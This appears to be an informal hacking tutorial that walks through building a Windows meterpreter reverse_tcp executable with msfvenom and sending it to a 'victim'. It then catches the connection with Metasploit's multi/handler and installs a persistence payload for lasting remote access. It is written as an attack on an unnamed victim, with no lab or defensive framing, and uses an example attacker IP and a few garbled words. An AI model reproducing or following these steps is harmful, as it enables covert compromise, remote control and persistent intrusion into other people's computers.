Now create payload
Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber -f exe>filename.exe
- Run this command and wait for 2 mints.
 - Now payload was created
 - open your [ Metasploit-framework/bin/ ] Folder check your exe file
 - Now send the exe file to victi
 
Now Open Metasploit Framework
- Open command prompt in this path [ Metasploit-framework/bin/ ]
 - msfconsole (if not work give this command msfconsole.bat )
 - Now Metasploit framework opened
 - use exploit/multi/handler
 - set payload windows/meterpreter/reverse_tcp
 - set LHOST yourip
 - set LPORT portnumber
 - exploit
 - Now started reverse tcp handler : 4444
 
Now server waiting for victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )
- Now Meterpreter session opened
 - Type "help" command to know all commands
 - sysinfo and more commands.
 
Persistence Attack
- run persistence -h
 - now it can show how to use commands
 - run persistence -U -i 20 -p portnumber -r yourip
 - Eg : run persistence -U -i 20 -p 4444 -r 123.323.4.241
 - hit enter to run the command
 - now it can automatically inject the persistence payload into victim system
 - Then any time you access the victim system
 


